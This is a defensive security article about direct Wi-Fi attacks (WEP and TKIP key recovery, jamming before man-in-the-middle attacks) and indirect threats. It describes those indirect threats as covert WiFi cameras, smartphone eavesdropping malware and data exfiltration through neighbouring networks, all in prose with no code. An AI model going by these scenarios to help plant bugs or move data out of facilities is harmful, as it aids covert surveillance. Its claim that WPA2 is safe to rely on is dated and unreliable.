Wi-Fi networks and threats to information security.
Dmitry Ivanovich Belorusov
Mikhail Sergeevich Koreshkov
«RICOM» Moscow
Wi-Fi networks and threats to information security
The article examines direct and indirect threats to information security that arise in connection with the development of WiFi wireless access technology. It is shown that the use of WiFi technology can threaten not only information transmitted directly using WiFi equipment, but also voice information at the facility.
The widespread use of wireless data networks based on IEEE 802.11 technology, better known as WiFi, cannot but attract the attention of information security specialists. In this article, the authors aim to acquaint readers with the results of research into new threats to information security of an object that are associated with WiFi networks.
Initially, WiFi technology was aimed at organizing fast Internet access points (hotspots) for mobile users. The technology allows for simultaneous access of a large number of subscribers to the Internet, primarily in public places (airports, restaurants, etc.). The advantages of wireless access are obvious, especially since WiFi technology initially became a de facto standard, and mobile computer manufacturers do not have questions about the compatibility of access points and mobile devices.
Gradually, WiFi networks spread to large and small offices to organize intra-corporate networks or subnets.
At the same time, large telecom operators began to develop their own services for providing paid wireless Internet access based on WiFi technology. Such networks consist of a large number of access points that organize coverage areas of entire city districts, similar to cellular communications.
As a result, at present, in any large city, next to almost any object, there are at least several WiFi networks with their own access points and clients, the number of which can reach hundreds.
Let's move on to considering the threats to information security that arise in connection with the use of WiFi networks. All threats can be conditionally divided into two classes:
- direct — threats to information security that arise when transmitting information via the IEEE 802.11 wireless interface;
- indirect — threats associated with the presence of a large number of WiFi networks at and near the facility that can be used to transmit information, including that obtained unauthorized.
Indirect threats are relevant for absolutely all organizations, and, as will be shown below, they pose a danger not only to information processed in computer networks, but also, most importantly, to voice information.
Let's consider direct threats. To organize a wireless communication channel in WiFi technology, a radio interface for data transmission is used. As a channel for transmitting information, it is potentially subject to unauthorized interference with the purpose of intercepting, distorting or blocking information.
When developing WiFi technology, some information security issues were taken into account, however, as practice shows, not enough.
Numerous «holes» in WiFi security have given rise to a separate trend in the computer hacking industry, the so-called wardriving. Wardrivers are people who hack other people's WiFi networks for the «sports» of it, which, however, does not diminish the danger of the threat.
Although WiFi technology provides authentication and encryption to protect traffic from interception at the channel layer, these security elements do not work effectively enough.
Firstly, the use of encryption reduces the speed of information transfer over the channel several times, and often encryption is deliberately disabled by network administrators to optimize traffic. Secondly, the use of the fairly common WEP encryption technology in WiFi networks has long been discredited due to weaknesses in the RC4 key distribution algorithm, which is used in conjunction with WEP. There are numerous programs that allow you to pick up «weak» WEP keys. This attack was named FMS after the first letters of the initials of the developers. Each packet containing a weak key, with a 5% probability, restores one byte of the secret key, so the total number of packets that the attacker must have to implement the attack depends primarily on his luck. On average, about six million encrypted packets are required to hack. Hackers from the H1kari of DasbOden Labs laboratory strengthened the FMS algorithm, reducing the number of required packets from six million to 500 thousand. And in some cases, a 40/104-bit key can be cracked with only three thousand packets, which allows attacking even home access points without stressing them with excessive traffic.
If the data exchange between legitimate clients and the access point is insignificant or practically absent, an attacker can force the victim to generate a large amount of traffic without even knowing the secret key. It is enough to simply intercept the correct packet and, without decrypting it, retransmit it again.
The hardware developers responded quite adequately, changing the algorithm for generating initialization vectors so that weak keys no longer arise.
In August 2004, a hacker named KoreK demonstrated the source code of a new cryptanalyzer that could crack even strong IVs. To recover a 40-bit key, he needed only 200,000 packets with unique IVs, and for a 104-bit key, 500,000. The number of packets with unique IVs averages about 95% of the total number of encrypted packets, so it would take an attacker very little time to recover the key.
New WiFi equipment uses WPA (WiFi Protected Access) technology, which has once again increased the security of wireless devices. WEP has been replaced by TKIP (Temporal Key Integrity Protocol — short-term key integrity protocol), which generates dynamic keys that replace each other at short intervals. Despite the relative novelty of this technology, some hacker utilities already include a special module that displays one of the protocol keys. This turned out to be quite sufficient for an unauthorized connection to an access point protected by WPA technology.
The IEEE 802.11i standard describes a more advanced security system (known as WPA2), based on the AES cryptographic algorithm. There are no ready-made utilities for cracking it in open form, so you can feel safe with this technology. At least for a while, it will last.
The threat of blocking information in the WiFi channel has been practically ignored during the development of the technology, which is in vain. Of course, blocking the channel itself is not dangerous, since WiFi networks are almost always auxiliary, but blocking is often only a preparatory stage for a man-in-the-middle attack, when a third device appears between the client and the access point, which redirects traffic between them through itself. In this case, there is not only a threat of interception of information, but also its distortion. At least several processed attacks on WiFi networks are known, related to denial of service DOS (Denail-of-Service), but within the framework of this article we will not dwell on their consideration, we will limit ourselves to stating only the presence of real threats.
Let us move on to considering indirect threats to the information security of an object that are directly related to WiFi technology.
WiFi network channels are extremely attractive for use as a transport infrastructure for devices for unauthorized acquisition of information for a number of reasons:
1. WiFi device signals have a fairly complex structure and a wide spectrum, so these signals, and even more so, surrounding WiFi devices, cannot be identified by conventional radio monitoring means.
As practice has shown, reliable detection of a WiFi signal by modern radio monitoring systems in a wide frequency band is possible only by the energy feature in the presence of parallel analysis bands several tens of MHz wide at a speed of at least 400 MHz/s and only in the near zone. Signals from access points located in the far zone are below the receiver noise level.
Detection of WiFi transmitters during sequential scanning by narrow-band receivers is generally impossible.
2. Almost every facility or its vicinity has private WiFi networks or public WiFi networks. In the environment of such networks, it is extremely difficult to distinguish legal clients of your own and neighboring networks from clients with the ability to secretly obtain information, which makes it possible to effectively mask unauthorized transmission of information among legal WiFi channels.
The WiFi transmitter emits a so-called «OFDM signal». This means that at one moment in time the device transmits in one signal occupying a wide frequency band (about 20 MHz), several information-carrying subcarriers of information channels, which are located so close to each other that when received by a conventional receiving device, the signal looks like a single «dome». Only a special receiver can separate the subcarriers in such a «dome» and identify the transmitting devices.
3. In large cities, public WiFi networks have a coverage area sufficient to guarantee the ability to connect to them for the transmission of information from almost any point. This eliminates the need to use a mobile information reception point near the facility, since information can be transmitted by an unauthorized device through a public access point and then over the Internet to any location.
4. The resources provided by WiFi network channels allow transmitting sound, data, and video in real time. This fact opens up wide opportunities for information interception devices. Now, not only sound information, but also video data from computers or a local network is under threat.
All the advantages of WiFi technology discussed above in terms of protecting information at a facility are disadvantages. In addition, small-sized WiFi devices are produced and sold absolutely legally that allow the transmission of data, voice or video information, for example, wireless WiFi video cameras, which can easily be converted for use as devices for covertly obtaining information.
Fig. 1. WiFi transmitter signal in the near zone
Fig. 2. Wireless WEB-camera with WiFi-interface
Next, we will consider practical implementations of indirect threats using real examples of the use of WiFi-devices for unauthorized acquisition of information.
1. An unauthorized WiFi video camera with a microphone is installed in the premises. To increase the range of information transmission, a WiFi access point is installed on the roof of the facility, which operates in repeater mode (one of the standard operating modes of a WiFi access point) with a directional antenna. In this case, information from the room in which the camera of the standard power of the WiFi client is installed can be received at a control point located several kilometers from the facility, even in urban conditions.
2. The smartphone of one of the company's employees can be switched to a mode using a special program (virus) in which speech information from the microphone will be recorded and transmitted to the control point using the WiFi module built into it.
To increase stealth, the checkpoint can also be used in one of the standard WiFi access point modes — «transmission with hidden name». In this case, the access point will be invisible to network environment review programs for wireless networks. It should be noted that WiFi clients are never visible in these programs.
3. And finally, let's consider the option when the mode at the facility does not allow taking the storage media outside of it, there is no Internet access or it is limited. How can an attacker transfer a sufficiently large amount of data from such a facility unnoticed? Answer: he needs to absolutely legally connect to a neighboring broadcast WiFi network and transfer the information, remaining unnoticed among a sufficiently large number of WiFi clients of neighboring networks transmitting information outside the facility.
Fig. 3. Indirect threat model
Conclusions:
WiFi technology is certainly convenient and universal for organizing wireless access to information. However, it carries many serious threats to the information security of the facility. At the same time, there are direct and indirect threats to information security. And if direct threats can be eliminated by refusing to use WiFi devices in the corporate network infrastructure and not using WiFi networks at the facility, then indirect threats exist regardless of the use of WiFi technology at the facility. In addition, indirect threats are more dangerous than direct ones, since they affect not only information in computer networks, but also voice information at the facility.
In conclusion, I would like to note that WiFi technology is currently not the only widespread wireless data transmission technology that can pose threats to the information security of an object.
Bluetooth devices can also be used to organize unauthorized wireless data transmission. Compared to WiFi, Bluetooth devices have significantly fewer capabilities in terms of data transmission range and channel capacity, but they have one important advantage — low power consumption, which is extremely important for an unauthorized transmitter.
Another technology that is beginning to compete with WiFi in providing wireless broadband access is WiMAX. However, as of today, WiMAX devices are much less common, and their presence is more likely to be a revealing factor than to hide an unauthorized information transmission channel.
Thus, it is WiFi that is currently not only the most common wireless access technology, but also the most convenient in terms of unauthorized receipt and transmission of information.
Literature
- Karolik A., Kaspersky K. Let's figure out what wardriving is and what it should be used with //Hacker. — №059. — P. 059-0081. http://xakep.ru/magazine/xs/059/008/1.asp
- Software and hardware complex for monitoring WiFi networks «Zodiac»